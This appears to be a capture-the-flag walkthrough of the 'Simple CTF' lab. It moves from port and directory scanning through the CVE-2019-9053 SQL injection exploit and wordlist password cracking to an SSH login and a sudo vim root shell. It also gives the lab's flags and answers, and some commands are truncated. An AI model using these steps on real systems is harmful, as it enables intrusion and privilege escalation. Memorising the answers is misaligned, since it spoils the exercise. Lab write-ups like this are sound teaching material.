Simple CTF Walkthrough

Simple CTF is an easy machine with straight forward progress, there’s no hidden or complicated steps but it will teach you mainly on how to use an exploit from exploit-db to access a system.

Let’s start by scanning the machine to see how many ports are open on the machine

nmap -sC -sV Machine_IP

Let’s get the results

Simple CTF nmap

here we can see 3 services running on the machine

  • FTP service port 21
  • Apache Service port 80
  • SSH service port 2222

then we can answer the following questions

How many services are running under port 1000?


What is running on the higher port?


Now Let’s investigate the services running, since we have an Apache service running, let’s start with it and open the website.

You should get the default Apache2 webpage, let’s run gobuster on the site while we investigate the FTP service

gobuster dir --url  http://machine_IP --wordlist  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z

While we wait for the results, let’s connect to FTP service since anonymous login is enabled.

You will get “pub” directory and if you go inside you should get “ForMitch.txt” that contains the following

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Great!, so we know the password is weak, and it’s crackable , let’s keep that in mind

Now you should get the results for gobuster or wait until it finishes, but you should get the following resuilts

Simple CTF gobuster

let’s access /simple and you would get the following website

Simple CTF Website

while we investigate the source code and what kind of CMS is this site, let’s run gobuster for this page and see if there are any hidden pages that can help us ( we actually won’t use it but in case there are the results)

gobuster dir --url  http://machine_IP/simple --wordlist  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
Simple CTF /simple gobuster

While we are waiting for gobuster results, let’s check this CMS, apparently this CMS is called “CMS Made Simple” with version 2.2.8 ( you can see it in the footer of the website)

Simple CTF CMS version

let’s check if there are any vulnerabilities for this CMS from searchsploit

searchsploit cms made simple 2.2.8 -w

and we got one results

Simple CTF searchsploit

let’s open the URL and get the CVE number for the next question.

Simple CTF CVE

as you can see the CVE is “2019-9053” but we need to add “CVE-” before the number for the answer, so it would be

What’s the CVE you’re using against the application?


To what kind of vulnerability is the application vulnerable?


Let’s download the exploit to understand it and use it, we can see that the exploit is targeting the following URL

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'

Now, this code is written with Python 2, while python3 is now the default along with pip3 for Linux, we need to install pip2.7 in order to run the code with python 2, you can use the library 2to3 to convert python 2 code to python 3 but it might not work.

You can install pip2.7 by running these commands (you can check StackOverFlow post)

sudo python2.7

and you should get the following output

so we need to specify the URL along with a Wordlist in order to get the password, so let’s do that

python2.7 -u --crack -w /usr/share/wordlists/rockyou.txt     
Simple CTF exploit

What’s the password?


Since we already got a hint that user “Mitch” uses the same password for everything, then we should get SSH to the machine with the same credentials.

Where can you login with the details obtained?


Let’s connect to to the machine through SSH with password “secret

ssh mitch@ -p2222   

and you should get the shell

Simple CTF mitch shell

now let’s output user.txt (you can just ls the directory)

What’s the user flag?

G00d j0b, keep up!

to check for other users, we can either ls the directories in /home or check /etc/passwd , I will list the directories in /home since it’s cleaner

Is there any other user in the home directory? What’s its name?


now to try to escalate the privilege, let’s check the basics by looking at which programs we can execute as sudo by running

sudo -l
Simple CTF sudo

and we got VIM as a result

What can you leverage to spawn a privileged shell?


now let’s run vim as sudo and get shell by getting the code from gtfobins

sudo vim -c ':!/bin/sh'
Simple CTF root shell

and we got the root access, now we can go and check for the flag (usually in root directory)

What’s the root flag?

W3ll d0n3. You made it!

and we’re done with this room, it was pretty simple and straight forward but we got to use a new exploit to access the machine.